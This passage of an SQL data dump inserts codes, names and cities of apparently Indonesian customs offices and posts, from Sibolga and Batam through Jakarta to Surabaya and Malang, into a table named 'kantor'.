INTO kantor VALUES ('011300', 'KANTOR PELAYANAN SIBOLGA', 'SIBOLGA'); INSERT INTO kantor VALUES ('011311', 'KANTOR BANTU GUNUNG SITOLI', ''); INSERT INTO kantor VALUES ('011331', 'POS BARUS', ''); INSERT INTO kantor VALUES ('011332', 'POS NATAL', ''); INSERT INTO kantor VALUES ('011334', 'POS TELUK DALAM', ''); INSERT INTO kantor VALUES ('011336', 'POS PULAU TELLO', ''); INSERT INTO kantor VALUES ('011340', 'POS SIBOLGA', ''); INSERT INTO kantor VALUES ('011500', 'KANTOR PELAYANAN TELUK BAYUR', 'TELUK BAYUR'); INSERT INTO kantor VALUES ('011511', 'KANTOR BANTU SIKAKAP', ''); INSERT INTO kantor VALUES ('011514', 'KANTOR BANTU TUA PEJAT', ''); INSERT INTO kantor VALUES ('011531', 'POS MUARA PADANG', ''); INSERT INTO kantor VALUES ('011534', 'POS SIBERUT MENTAWAI', ''); INSERT INTO kantor VALUES ('011537', 'POS PARIAMAN', ''); INSERT INTO kantor VALUES ('011539', 'POS PAINAN', ''); INSERT INTO kantor VALUES ('011540', 'POS MUARO', ''); INSERT INTO kantor VALUES ('011543', 'POS TELUK BAYUR', ''); INSERT INTO kantor VALUES ('011544', 'POS CUBADAK', ''); INSERT INTO kantor VALUES ('011545', 'POS AIR BANGIS', ''); INSERT INTO kantor VALUES ('011546', 'POS BUNGUS', ''); INSERT INTO kantor VALUES ('011547', 'POS BANDARA TABING', ''); INSERT INTO kantor VALUES ('020000', 'KANTOR WILAYAH II TANJUNG BALAI KARIMUN', 'TG. BALAI KARIMUN'); INSERT INTO kantor VALUES ('020100', 'KANTOR PELAYANAN TANJUNG BALAI KARIMUN', 'TG. BALAI KARIMUN'); INSERT INTO kantor VALUES ('020101', 'PANGKALAN SARANA OPERASI TANJUNG BALAI KARIMUN', ''); INSERT INTO kantor VALUES ('020112', 'KANTOR BANTU TELUK PAKU', ''); INSERT INTO kantor VALUES ('020131', 'KANTOR BANTU MORO SULIT', ''); INSERT INTO kantor VALUES ('020132', 'KANTOR BANTU TANJUNG BATU', ''); INSERT INTO kantor VALUES ('020133', 'POS SAWANG', ''); INSERT INTO kantor VALUES ('020134', 'POS URUNG', ''); INSERT INTO kantor VALUES ('020136', 'POS TANJUNG BALAI KARIMUN', ''); INSERT INTO kantor VALUES ('020137', 'POS PASIR PANJANG', ''); INSERT INTO kantor VALUES ('020200', 'KANTOR PELAYANAN SAMBU BELAKANG PADANG', 'SAMBU BLK. PADANG'); INSERT INTO kantor VALUES ('020231', 'POS PULAU LAYANG', ''); INSERT INTO kantor VALUES ('020232', 'POS PULAU PELAMPUNG', ''); INSERT INTO kantor VALUES ('020233', 'POS SUMBU BELAKANG PADANG', ''); INSERT INTO kantor VALUES ('020300', 'KANTOR PELAYANAN SELAT PANJANG', 'SELAT PANJANG'); INSERT INTO kantor VALUES ('020331', 'POS TANJUNG SAMAK', ''); INSERT INTO kantor VALUES ('020332', 'POS TELUK BELITUNG', ''); INSERT INTO kantor VALUES ('020333', 'POS TERUS', ''); INSERT INTO kantor VALUES ('020336', 'POS TANJUNG KEDABU', ''); INSERT INTO kantor VALUES ('020337', 'POS PENYALAI', ''); INSERT INTO kantor VALUES ('020338', 'POS SELAT PANJANG', ''); INSERT INTO kantor VALUES ('020339', 'POS TANJUNG MOTONG', ''); INSERT INTO kantor VALUES ('020340', 'POS SERAPUNG', ''); INSERT INTO kantor VALUES ('020400', 'KANTOR PELAYANAN BATAM', 'BATAM'); INSERT INTO kantor VALUES ('020411', 'KANTOR BANTU PULAU REMPANG', ''); INSERT INTO kantor VALUES ('020412', 'KANTOR BANTU PULAU GALANG', ''); INSERT INTO kantor VALUES ('020431', 'POS PULAU BULUH', ''); INSERT INTO kantor VALUES ('020432', 'POS TANJUNG RIAU', ''); INSERT INTO kantor VALUES ('020433', 'POS TANJUNG UNCANG', ''); INSERT INTO kantor VALUES ('020434', 'POS TANJUNG PIAYU', ''); INSERT INTO kantor VALUES ('020435', 'POS BATU BESAR PANTAI', ''); INSERT INTO kantor VALUES ('020436', 'POS SEI JODOH', ''); INSERT INTO kantor VALUES ('020437', 'POS MOMOI', ''); INSERT INTO kantor VALUES ('020438', 'POS TANJUNG SAU', ''); INSERT INTO kantor VALUES ('020439', 'POS PULAU NGENANG', ''); INSERT INTO kantor VALUES ('020440', 'POS JANDA BERHIAS', ''); INSERT INTO kantor VALUES ('020441', 'POS TANJUNG KASEM', ''); INSERT INTO kantor VALUES ('020442', 'POS TELAGA PUNGGUR', ''); INSERT INTO kantor VALUES ('020443', 'POS NONGSA', ''); INSERT INTO kantor VALUES ('020444', 'POS SAGULUNG', ''); INSERT INTO kantor VALUES ('020445', 'POS BATU AMPAR I', ''); INSERT INTO kantor VALUES ('020446', 'POS BATU AMPAR II', ''); INSERT INTO kantor VALUES ('020447', 'POS BANDARA I', ''); INSERT INTO kantor VALUES ('020448', 'POS BANDARA II', ''); INSERT INTO kantor VALUES ('020449', 'POS MACOBAR', ''); INSERT INTO kantor VALUES ('020450', 'POS KABIL', ''); INSERT INTO kantor VALUES ('020453', 'POS SEKUPANG', ''); INSERT INTO kantor VALUES ('020455', 'POS TANJUNG REMPANG', ''); INSERT INTO kantor VALUES ('020456', 'POS TANJUNG SIPATUNG', ''); INSERT INTO kantor VALUES ('020457', 'POS TANJUNG KAREPA', ''); INSERT INTO kantor VALUES ('020458', 'POS POKOB BARAT', ''); INSERT INTO kantor VALUES ('020459', 'POS TANJUNG CAKANG', ''); INSERT INTO kantor VALUES ('020500', 'KANTOR PELAYANAN TANJUNG PINANG', 'TANJUNG PINANG'); INSERT INTO kantor VALUES ('020536', 'POS TANJUNG PINANG', ''); INSERT INTO kantor VALUES ('020537', 'POS BANDARA KIJANG', ''); INSERT INTO kantor VALUES ('020538', 'POS PELABUHAN KIJANG', ''); INSERT INTO kantor VALUES ('020600', 'KANTOR PELAYANAN TANJUNG UBAN', 'TANJUNG UBAN'); INSERT INTO kantor VALUES ('020632', 'POS TANJUNG UBAN', ''); INSERT INTO kantor VALUES ('020633', 'POS LAGOI', ''); INSERT INTO kantor VALUES ('020634', 'POS LOBAM', ''); INSERT INTO kantor VALUES ('020800', 'KANTOR PELAYANAN DABO SINGKEP', 'DABO SINGKEP'); INSERT INTO kantor VALUES ('020831', 'POS PENUBA', ''); INSERT INTO kantor VALUES ('020832', 'POS SUNGAI BULUH', ''); INSERT INTO kantor VALUES ('020833', 'POS SENAYANG', ''); INSERT INTO kantor VALUES ('020834', 'POS DAIK', ''); INSERT INTO kantor VALUES ('020835', 'POS BANDARA DABO', ''); INSERT INTO kantor VALUES ('020836', 'POS DABO SINGKEP', ''); INSERT INTO kantor VALUES ('020900', 'KANTOR PELAYANAN DUMAI', 'DUMAI'); INSERT INTO kantor VALUES ('020911', 'KANTOR BANTU TANJUNG MEDANG', ''); INSERT INTO kantor VALUES ('020931', 'POS SELAT MORONG', ''); INSERT INTO kantor VALUES ('020932', 'POS TANAH PUTIH', ''); INSERT INTO kantor VALUES ('020933', 'POS DUMAI', ''); INSERT INTO kantor VALUES ('020934', 'POS TANJUNG MEDANG', ''); INSERT INTO kantor VALUES ('021000', 'KANTOR PELAYANAN BAGAN SIAPI-API', 'BAGAN SIAPI-API'); INSERT INTO kantor VALUES ('021011', 'KANTOR BANTU PENIPAHAN', ''); INSERT INTO kantor VALUES ('021032', 'POS SINABOI', ''); INSERT INTO kantor VALUES ('021033', 'POS LUMBA-LUMBA', ''); INSERT INTO kantor VALUES ('021034', 'POS PULAU HALANG', ''); INSERT INTO kantor VALUES ('021035', 'POS BAGAN SIAPI-API', ''); INSERT INTO kantor VALUES ('021100', 'KANTOR PELAYANAN BENGKALIS', 'BENGKALIS'); INSERT INTO kantor VALUES ('021111', 'KANTOR BANTU SUNGAI PAKNING', ''); INSERT INTO kantor VALUES ('021112', 'KANTOR BANTU BANTAN TENGAH', ''); INSERT INTO kantor VALUES ('021131', 'POS SIAK KECIL', ''); INSERT INTO kantor VALUES ('021132', 'POS SEI KEMBUNG', ''); INSERT INTO kantor VALUES ('021133', 'POS BANDUL', ''); INSERT INTO kantor VALUES ('021134', 'POS BUKIT BATU', ''); INSERT INTO kantor VALUES ('021136', 'POS PRAPAT TUNGGAL', ''); INSERT INTO kantor VALUES ('021137', 'POS BENGKALIS', ''); INSERT INTO kantor VALUES ('021200', 'KANTOR PELAYANAN PEKANBARU', 'PEKANBARU'); INSERT INTO kantor VALUES ('021211', 'KANTOR BANTU PERAWANG', ''); INSERT INTO kantor VALUES ('021212', 'KANTOR BANTU RUMBAI', ''); INSERT INTO kantor VALUES ('021213', 'KANTOR BANTU RANTAU PANJANG', ''); INSERT INTO kantor VALUES ('021231', 'POS BANDARA I', ''); INSERT INTO kantor VALUES ('021232', 'POS BANDARA II', ''); INSERT INTO kantor VALUES ('021233', 'POS BUATAN', ''); INSERT INTO kantor VALUES ('021300', 'KANTOR PELAYANAN SIAK SRI INDRAPURA', 'SIAK SRI INDRAPURA'); INSERT INTO kantor VALUES ('021331', 'POS SUNGAI APIT', ''); INSERT INTO kantor VALUES ('021333', 'POS TANJUNG BUTON', ''); INSERT INTO kantor VALUES ('021334', 'POS SIAK SRI INDRA PURA', ''); INSERT INTO kantor VALUES ('021500', 'KANTOR PELAYANAN KUALA ENOK', 'KUALA ENOK'); INSERT INTO kantor VALUES ('021511', 'KANTOR BANTU SUNGAI GUNTUNG', ''); INSERT INTO kantor VALUES ('021513', 'KANTOR BANTU RENGAT', ''); INSERT INTO kantor VALUES ('021531', 'POS PERIGI RAJA', ''); INSERT INTO kantor VALUES ('021532', 'POS CONCONG LUAR', ''); INSERT INTO kantor VALUES ('021533', 'POS SEI BULUH, INDRAGIRI', ''); INSERT INTO kantor VALUES ('021534', 'POS PULAU KIJANG', ''); INSERT INTO kantor VALUES ('021535', 'POS KUALA GADUNG', ''); INSERT INTO kantor VALUES ('021536', 'POS KUALA BLARAS', ''); INSERT INTO kantor VALUES ('021538', 'POS KUALA ENOK', ''); INSERT INTO kantor VALUES ('021543', 'POS KUALACINAKU', ''); INSERT INTO kantor VALUES ('021544', 'POS BANDARA JAPURA', ''); INSERT INTO kantor VALUES ('021545', 'POS PULAU CAWAN', ''); INSERT INTO kantor VALUES ('021546', 'POS KUALA BAYAS', ''); INSERT INTO kantor VALUES ('021547', 'POS PULAU BURUNG', ''); INSERT INTO kantor VALUES ('021700', 'KANTOR PELAYANAN RANAI', ''); INSERT INTO kantor VALUES ('021711', 'KANTOR BANTU TAREMPA', ''); INSERT INTO kantor VALUES ('021731', 'POS UDANG NATUNA', ''); INSERT INTO kantor VALUES ('021732', 'POS MATAK', ''); INSERT INTO kantor VALUES ('021733', 'POS SERASAN', ''); INSERT INTO kantor VALUES ('021734', 'POS MIDAI', ''); INSERT INTO kantor VALUES ('021735', 'POS TAMBELAN', ''); INSERT INTO kantor VALUES ('021736', 'POS JEMAJA', ''); INSERT INTO kantor VALUES ('021737', 'POS BUNGURAN BARAT', ''); INSERT INTO kantor VALUES ('021738', 'POS BUNGURAN TIMUR', ''); INSERT INTO kantor VALUES ('030000', 'KANTOR WILAYAH III PALEMBANG', 'PALEMBANG'); INSERT INTO kantor VALUES ('030100', 'KANTOR PELAYANAN PALEMBANG', 'PALEMBANG'); INSERT INTO kantor VALUES ('030131', 'POS TANJUNG BUYUT', ''); INSERT INTO kantor VALUES ('030134', 'POS MUARAENIM', ''); INSERT INTO kantor VALUES ('030135', 'POS SEKAYU', ''); INSERT INTO kantor VALUES ('030136', 'POS LUBUKLINGGAU', ''); INSERT INTO kantor VALUES ('030138', 'POS BATURAJA', ''); INSERT INTO kantor VALUES ('030139', 'POS PALEMBANG', ''); INSERT INTO kantor VALUES ('030140', 'POS PLAJU', ''); INSERT INTO kantor VALUES ('030141', 'POS SUNGAI GERONG', ''); INSERT INTO kantor VALUES ('030142', 'POS KERTAPATI', ''); INSERT INTO kantor VALUES ('030143', 'POS PUSRI', ''); INSERT INTO kantor VALUES ('030144', 'POS BANDARA S. BADARUDIN II', ''); INSERT INTO kantor VALUES ('030200', 'KANTOR PELAYANAN BENGKULU', 'PULAU BAAI'); INSERT INTO kantor VALUES ('030231', 'POS LINAU', ''); INSERT INTO kantor VALUES ('030232', 'POS MUKO-MUKO', ''); INSERT INTO kantor VALUES ('030233', 'POS PULAU ENGGANO', ''); INSERT INTO kantor VALUES ('030235', 'POS P.BAI', ''); INSERT INTO kantor VALUES ('030237', 'POS BANDARA PADANG KEMILANG', ''); INSERT INTO kantor VALUES ('030300', 'KANTOR PELAYANAN PANGKAL PINANG', 'PANGKAL BALAM'); INSERT INTO kantor VALUES ('030311', 'KANTOR BANTU BELINYU', ''); INSERT INTO kantor VALUES ('030312', 'KANTOR BANTU MUNTOK', ''); INSERT INTO kantor VALUES ('030332', 'POS KURAU', ''); INSERT INTO kantor VALUES ('030333', 'POS SUNGAI LIAT', ''); INSERT INTO kantor VALUES ('030334', 'POS LUBUK BESAR', ''); INSERT INTO kantor VALUES ('030335', 'POS SUNGAI SELAN', ''); INSERT INTO kantor VALUES ('030337', 'POS PANGKAL BALAM', ''); INSERT INTO kantor VALUES ('030338', 'POS TOBOALI', ''); INSERT INTO kantor VALUES ('030339', 'POS AIR ITAM', ''); INSERT INTO kantor VALUES ('030340', 'POS DEPATI AMIR BANGKA', ''); INSERT INTO kantor VALUES ('030341', 'POS JEBUS', ''); INSERT INTO kantor VALUES ('030342', 'POS KAYU ARANG', ''); INSERT INTO kantor VALUES ('030343', 'POS TEMPILANG', ''); INSERT INTO kantor VALUES ('030344', 'POS MUNTOK', ''); INSERT INTO kantor VALUES ('030500', 'KANTOR PELAYANAN TANJUNG PANDAN', 'TANJUNG PANDAN'); INSERT INTO kantor VALUES ('030511', 'KANTOR BANTU MANGGAR', ''); INSERT INTO kantor VALUES ('030535', 'POS TANJUNG PANDAN', ''); INSERT INTO kantor VALUES ('030537', 'POS KAMPIT', ''); INSERT INTO kantor VALUES ('030538', 'POS BANDARA H. AS. HANANDJOEDDIN BELITUNG', ''); INSERT INTO kantor VALUES ('030600', 'KANTOR PELAYANAN JAMBI', 'JAMBI'); INSERT INTO kantor VALUES ('030611', 'KANTOR BANTU KUALA TUNGKAL', ''); INSERT INTO kantor VALUES ('030612', 'KANTOR BANTU MUARA SABAK', ''); INSERT INTO kantor VALUES ('030631', 'POS PANGKAL DURI', ''); INSERT INTO kantor VALUES ('030632', 'POS SIMBUR NAIR', ''); INSERT INTO kantor VALUES ('030633', 'POS KUALA MENDAHARA', ''); INSERT INTO kantor VALUES ('030634', 'POS KAMPUNG LAUT', ''); INSERT INTO kantor VALUES ('030635', 'POS NIPAH PANJANG', ''); INSERT INTO kantor VALUES ('030636', 'POS JAMBI', ''); INSERT INTO kantor VALUES ('030637', 'POS KUALA TUNGKAL', ''); INSERT INTO kantor VALUES ('030700', 'KANTOR PELAYANAN BANDAR LAMPUNG', 'PANJANG'); INSERT INTO kantor VALUES ('030712', 'KANTOR BANTU KOTA AGUNG', ''); INSERT INTO kantor VALUES ('030735', 'POS KALIANDA', ''); INSERT INTO kantor VALUES ('030736', 'POS PUTIH MATARAM', ''); INSERT INTO kantor VALUES ('030739', 'POS WAY SEPUTIH', ''); INSERT INTO kantor VALUES ('030744', 'POS BAKAUHENI', ''); INSERT INTO kantor VALUES ('030745', 'POS DIPASENA', ''); INSERT INTO kantor VALUES ('030746', 'POS BRATASENA', ''); INSERT INTO kantor VALUES ('030747', 'POS BANDARA RADIN INTEN', ''); INSERT INTO kantor VALUES ('040000', 'KANTOR WILAYAH IV JAKARTA', 'JAKARTA'); INSERT INTO kantor VALUES ('040100', 'KANTOR PELAYANAN TANJUNG PRIOK I', 'JAKARTA'); INSERT INTO kantor VALUES ('040101', 'PANGKALAN SARANA OPERASI TANJUNG PRIOK', ''); INSERT INTO kantor VALUES ('040111', 'KANTOR BANTU SUNDA KELAPA', ''); INSERT INTO kantor VALUES ('040138', 'POS UTAMA E', ''); INSERT INTO kantor VALUES ('040142', 'POS UTPK II', ''); INSERT INTO kantor VALUES ('040143', 'POS SUNDA KELAPA', ''); INSERT INTO kantor VALUES ('040145', 'POS WIDURI', ''); INSERT INTO kantor VALUES ('040146', 'POS ARJUNA', ''); INSERT INTO kantor VALUES ('040147', 'POS CINTA NATOMAR', ''); INSERT INTO kantor VALUES ('040148', 'POS KBN', ''); INSERT INTO kantor VALUES ('040149', 'POS NUSANTARA I (002)', ''); INSERT INTO kantor VALUES ('040150', 'POS NUSANTARA II (005)', ''); INSERT INTO kantor VALUES ('040151', 'POS 009 X', ''); INSERT INTO kantor VALUES ('040152', 'POS ARSA', ''); INSERT INTO kantor VALUES ('040153', 'PELAB. PELNI BARAT (POS 104)', ''); INSERT INTO kantor VALUES ('040154', 'TERMINAL PENUMPANG', ''); INSERT INTO kantor VALUES ('040155', 'POS LAPANGAN 207X', ''); INSERT INTO kantor VALUES ('040156', 'POS BANTU KADE 301/302', ''); INSERT INTO kantor VALUES ('040157', 'POS KADE 209/210', ''); INSERT INTO kantor VALUES ('040158', 'BANDA', ''); INSERT INTO kantor VALUES ('040159', 'MARINA ANCOL', ''); INSERT INTO kantor VALUES ('040160', 'MUARA BARU', ''); INSERT INTO kantor VALUES ('040200', 'KANTOR PELAYANAN TANJUNG PRIOK II', 'JAKARTA'); INSERT INTO kantor VALUES ('040241', 'POS UTPK I (EKSPOR)', ''); INSERT INTO kantor VALUES ('040242', 'POS UTPK I (IMPOR)', ''); INSERT INTO kantor VALUES ('040245', 'POS BEA CUKAI 305', ''); INSERT INTO kantor VALUES ('040246', 'POS BITUNG UTAMA A', ''); INSERT INTO kantor VALUES ('040247', 'POS BITUNG UTAMA B', ''); INSERT INTO kantor VALUES ('040300', 'KANTOR PELAYANAN TANJUNG PRIOK III', 'JAKARTA'); INSERT INTO kantor VALUES ('040333', 'POS DWIPA I', ''); INSERT INTO kantor VALUES ('040334', 'POS DWIPA II', ''); INSERT INTO kantor VALUES ('040335', 'POS UTPK KOJA I', ''); INSERT INTO kantor VALUES ('040337', 'AGUNG RAYA', ''); INSERT INTO kantor VALUES ('040338', 'POS CILINCING', ''); INSERT INTO kantor VALUES ('040339', 'POS PERTAMINA', ''); INSERT INTO kantor VALUES ('040340', 'POS BOGASARI', ''); INSERT INTO kantor VALUES ('040341', 'POS MARUNDA', ''); INSERT INTO kantor VALUES ('040342', 'DHARMA KARYA PERDANA', ''); INSERT INTO kantor VALUES ('040343', 'KALIBARU', ''); INSERT INTO kantor VALUES ('040400', 'KANTOR PELAYANAN JAKARTA', 'JAKARTA'); INSERT INTO kantor VALUES ('040432', 'POS UDARA HALIM PERDANA KUSUMA', ''); INSERT INTO kantor VALUES ('040600', 'KANTOR PELAYANAN KANTOR POS PASAR BARU', 'JAKARTA'); INSERT INTO kantor VALUES ('050000', 'KANTOR WILAYAH JAWA BARAT', 'BANDUNG'); INSERT INTO kantor VALUES ('050100', 'KANTOR PELAYANAN SUKARNO-HATTA', 'CENGKARENG'); INSERT INTO kantor VALUES ('050132', 'POS TANGERANG', ''); INSERT INTO kantor VALUES ('050134', 'POS BANDARA I', ''); INSERT INTO kantor VALUES ('050135', 'POS BANDARA II', ''); INSERT INTO kantor VALUES ('050136', 'POS BANDARA III', ''); INSERT INTO kantor VALUES ('050300', 'KANTOR PELAYANAN BOGOR', 'BOGOR'); INSERT INTO kantor VALUES ('050331', 'POS SUKABUMI', 'SUKABUMI'); INSERT INTO kantor VALUES ('050336', 'POS PEL. RATU', ''); INSERT INTO kantor VALUES ('050337', 'POS DEPOK', ''); INSERT INTO kantor VALUES ('050338', 'POS CIANJUR', ''); INSERT INTO kantor VALUES ('050339', 'POS CIBINONG', ''); INSERT INTO kantor VALUES ('050400', 'KANTOR PELAYANAN MERAK', 'MERAK'); INSERT INTO kantor VALUES ('050437', 'POS MERAK', ''); INSERT INTO kantor VALUES ('050439', 'POS TANJUNG LENENG', ''); INSERT INTO kantor VALUES ('050440', 'POS CIGADING', ''); INSERT INTO kantor VALUES ('050441', 'POS CHANDRA ASRI', ''); INSERT INTO kantor VALUES ('050442', 'POS CIWANDAN', ''); INSERT INTO kantor VALUES ('050500', 'KANTOR PELAYANAN BANDUNG', 'BANDUNG'); INSERT INTO kantor VALUES ('050531', 'POS SUMEDANG', ''); INSERT INTO kantor VALUES ('050535', 'POS GEDE BAGE', ''); INSERT INTO kantor VALUES ('050536', 'POS BANDARA I', ''); INSERT INTO kantor VALUES ('050537', 'POS BANDARA II', ''); INSERT INTO kantor VALUES ('050600', 'KANTOR PELAYANAN TASIKMALAYA', 'TASIKMALAYA'); INSERT INTO kantor VALUES ('050631', 'POS GARUT', ''); INSERT INTO kantor VALUES ('050632', 'POS CIAMIS', ''); INSERT INTO kantor VALUES ('050633', 'POS PANGANDARAN', ''); INSERT INTO kantor VALUES ('050634', 'POS TASIKMALAYA', ''); INSERT INTO kantor VALUES ('050700', 'KANTOR PELAYANAN CIREBON', 'CIREBON'); INSERT INTO kantor VALUES ('050711', 'KANTOR BANTU BALONGAN', ''); INSERT INTO kantor VALUES ('050745', 'POS CIREBON', ''); INSERT INTO kantor VALUES ('050746', 'POS NASA SARI ACID', ''); INSERT INTO kantor VALUES ('050747', 'POS PALIMANAN', ''); INSERT INTO kantor VALUES ('050800', 'KPPBC TIPE A2 PURWAKARTA', 'PURWAKARTA'); INSERT INTO kantor VALUES ('050833', 'POS PURWAKARTA', ''); INSERT INTO kantor VALUES ('050834', 'POS SUBANG', ''); INSERT INTO kantor VALUES ('050836', 'POS CILAMAYA', ''); INSERT INTO kantor VALUES ('050900', 'KANTOR PELAYANAN BEKASI', 'BEKASI'); INSERT INTO kantor VALUES ('060000', 'KANTOR WILAYAH VI SEMARANG', 'SEMARANG'); INSERT INTO kantor VALUES ('060100', 'KANTOR PELAYANAN TANJUNG EMAS', 'SEMARANG'); INSERT INTO kantor VALUES ('060133', 'POS DEMAK', ''); INSERT INTO kantor VALUES ('060134', 'POS PURWODADI', ''); INSERT INTO kantor VALUES ('060135', 'POS SALATIGA', ''); INSERT INTO kantor VALUES ('060136', 'POS TANJUNG EMAS I', ''); INSERT INTO kantor VALUES ('060137', 'POS TANJUNG EMAS II', ''); INSERT INTO kantor VALUES ('060138', 'POS TANJUNG EMAS III', ''); INSERT INTO kantor VALUES ('060139', 'POS BANDARA I', ''); INSERT INTO kantor VALUES ('060140', 'POS BANDARA II', ''); INSERT INTO kantor VALUES ('060141', 'POS KALIWUNGU', ''); INSERT INTO kantor VALUES ('060143', 'POS LIK SEMARANG', ''); INSERT INTO kantor VALUES ('060200', 'KANTOR PELAYANAN PEKALONGAN', 'PEKALONGAN'); INSERT INTO kantor VALUES ('060235', 'POS BATANG', ''); INSERT INTO kantor VALUES ('060236', 'POS PEKALONGAN', ''); INSERT INTO kantor VALUES ('060300', 'KANTOR PELAYANAN KUDUS', 'KUDUS'); INSERT INTO kantor VALUES ('060311', 'KANTOR BANTU JUWONO', ''); INSERT INTO kantor VALUES ('060312', 'KANTOR BANTU JEPARA', ''); INSERT INTO kantor VALUES ('060332', 'POS BANYUTOWO', ''); INSERT INTO kantor VALUES ('060333', 'POS REMBANG', 'REMBANG'); INSERT INTO kantor VALUES ('060334', 'POS CEPU', 'CEPU'); INSERT INTO kantor VALUES ('060338', 'POS BLORA', ''); INSERT INTO kantor VALUES ('060339', 'POS KARIMUN JAWA', ''); INSERT INTO kantor VALUES ('060400', 'KANTOR PELAYANAN CILACAP', 'CILACAP'); INSERT INTO kantor VALUES ('060412', 'KANTOR BANTU PURWOKERTO', ''); INSERT INTO kantor VALUES ('060413', 'KANTOR BANTU KEBUMEN', ''); INSERT INTO kantor VALUES ('060431', 'POS BANDARA TUNGGUL WULUNG', ''); INSERT INTO kantor VALUES ('060433', 'POS MAJENANG', ''); INSERT INTO kantor VALUES ('060434', 'POS TANJUNG INTAN', ''); INSERT INTO kantor VALUES ('060435', 'POS PURBALINGGA', ''); INSERT INTO kantor VALUES ('060436', 'POS BANJARNEGARA', ''); INSERT INTO kantor VALUES ('060437', 'POS PURWOREJO', ''); INSERT INTO kantor VALUES ('060600', 'KANTOR PELAYANAN SURAKARTA', 'SURAKARTA'); INSERT INTO kantor VALUES ('060637', 'POS KEBAK KRAMAT', ''); INSERT INTO kantor VALUES ('060638', 'POS KLATEN', ''); INSERT INTO kantor VALUES ('060639', 'POS KARANGANYAR', ''); INSERT INTO kantor VALUES ('060640', 'POS SRAGEN', ''); INSERT INTO kantor VALUES ('060641', 'POS SUKOHARDJO', ''); INSERT INTO kantor VALUES ('060642', 'POS WONOGIRI', ''); INSERT INTO kantor VALUES ('060643', 'POS BOYOLALI', ''); INSERT INTO kantor VALUES ('060644', 'POS JEBRES', ''); INSERT INTO kantor VALUES ('060645', 'POS BANDARA I', ''); INSERT INTO kantor VALUES ('060646', 'POS BANDARA II', ''); INSERT INTO kantor VALUES ('060700', 'KANTOR PELAYANAN YOGYAKARTA', 'YOGYAKARTA'); INSERT INTO kantor VALUES ('060711', 'KANTOR BANTU MAGELANG', ''); INSERT INTO kantor VALUES ('060732', 'POS SLEMAN', ''); INSERT INTO kantor VALUES ('060733', 'POS WATES', ''); INSERT INTO kantor VALUES ('060734', 'POS BANTUL', ''); INSERT INTO kantor VALUES ('060735', 'POS WONOSARI', ''); INSERT INTO kantor VALUES ('060736', 'POS BANDARA I', ''); INSERT INTO kantor VALUES ('060737', 'POS BANDARA II', ''); INSERT INTO kantor VALUES ('060738', 'POS TEMANGGUNG', ''); INSERT INTO kantor VALUES ('060739', 'POS WONOSOBO', ''); INSERT INTO kantor VALUES ('061000', 'KANTOR PELAYANAN TEGAL', 'TEGAL'); INSERT INTO kantor VALUES ('061035', 'POS BREBES', 'BREBES'); INSERT INTO kantor VALUES ('061036', 'POS PEMALANG', ''); INSERT INTO kantor VALUES ('061037', 'POS SLAWI', ''); INSERT INTO kantor VALUES ('061038', 'POS COMAL', ''); INSERT INTO kantor VALUES ('061039', 'POS SURODADI', ''); INSERT INTO kantor VALUES ('061040', 'POS TEGAL', ''); INSERT INTO kantor VALUES ('061041', 'POS SUGIH WARAS', ''); INSERT INTO kantor VALUES ('070000', 'KANTOR WILAYAH VII SURABAYA', 'SURABAYA'); INSERT INTO kantor VALUES ('070100', 'KANTOR PELAYANAN TANJUNG PERAK', 'SURABAYA'); INSERT INTO kantor VALUES ('070134', 'POS ICT I', ''); INSERT INTO kantor VALUES ('070135', 'POS ICT II', ''); INSERT INTO kantor VALUES ('070136', 'POS NILAM I', ''); INSERT INTO kantor VALUES ('070137', 'POS NILAM II', ''); INSERT INTO kantor VALUES ('070138', 'POS BERLIAN I', ''); INSERT INTO kantor VALUES ('070139', 'POS BERLIAN II', ''); INSERT INTO kantor VALUES ('070140', 'POS MIRAH I', ''); INSERT INTO kantor VALUES ('070141', 'POS MIRAH II', ''); INSERT INTO kantor VALUES ('070142', 'POS JAMRUD I', ''); INSERT INTO kantor VALUES ('070143', 'POS JAMRUD II', ''); INSERT INTO kantor VALUES ('070144', 'POS ICT III', ''); INSERT INTO kantor VALUES ('070145', 'POS ICT IV', ''); INSERT INTO kantor VALUES ('070200', 'KANTOR PELAYANAN KALIANGET', 'KALIANGET'); INSERT INTO kantor VALUES ('070201', 'BALAI PENGUJIAN DAN IDENTIFIKASI BARANG SURABAYA', ''); INSERT INTO kantor VALUES ('070233', 'POS PASEAN', ''); INSERT INTO kantor VALUES ('070234', 'POS SAMPANG', 'SAMPANG'); INSERT INTO kantor VALUES ('070236', 'POS BONGKEK', ''); INSERT INTO kantor VALUES ('070239', 'POS SAPUDI', ''); INSERT INTO kantor VALUES ('070240', 'POS KANGEAN', ''); INSERT INTO kantor VALUES ('070243', 'POS BRANTA', ''); INSERT INTO kantor VALUES ('070244', 'POS BANDARA TRUNOJOYO', ''); INSERT INTO kantor VALUES ('070245', 'POS KALIANGET', ''); INSERT INTO kantor VALUES ('070246', 'POS TELAGA BIRU', ''); INSERT INTO kantor VALUES ('070247', 'POS PAGERUNGAN', ''); INSERT INTO kantor VALUES ('070300', 'KANTOR PELAYANAN GRESIK', 'GRESIK'); INSERT INTO kantor VALUES ('070331', 'POS TAMBAK', ''); INSERT INTO kantor VALUES ('070332', 'POS SEDAYULAWAS', ''); INSERT INTO kantor VALUES ('070334', 'POS LAMONGAN', ''); INSERT INTO kantor VALUES ('070335', 'POS GRESIK', ''); INSERT INTO kantor VALUES ('070336', 'POS POLENG', ''); INSERT INTO kantor VALUES ('070337', 'POS SANGKA PURA', ''); INSERT INTO kantor VALUES ('070338', 'POS NGIMBOH', ''); INSERT INTO kantor VALUES ('070400', 'KANTOR PELAYANAN BOJONEGORO', 'BOJONEGORO'); INSERT INTO kantor VALUES ('070431', 'POS GLONDONG', ''); INSERT INTO kantor VALUES ('070432', 'POS SOCOREJO-JENU', ''); INSERT INTO kantor VALUES ('070433', 'POS TUBAN', ''); INSERT INTO kantor VALUES ('070500', 'KANTOR PELAYANAN JUANDA', 'SURABAYA'); INSERT INTO kantor VALUES ('070531', 'POS MOJOKERTO', 'MOJOKERTO'); INSERT INTO kantor VALUES ('070533', 'POS SIDOARJO', 'SIDOARJO'); INSERT INTO kantor VALUES ('070539', 'POS BANDARA I', ''); INSERT INTO kantor VALUES ('070540', 'POS BANDARA II', ''); INSERT INTO kantor VALUES ('070541', 'POS BANDARA III', ''); INSERT INTO kantor VALUES ('070543', 'POS WATES', ''); INSERT INTO kantor VALUES ('070600', 'KANTOR PELAYANAN MALANG', 'MALANG'); INSERT INTO kantor VALUES ('070634', 'POS SENDANG BIRU', ''); INSERT INTO kantor VALUES ('070635', 'POS BANDARA ABDULRACHMAN SALEH', ''); INSERT INTO 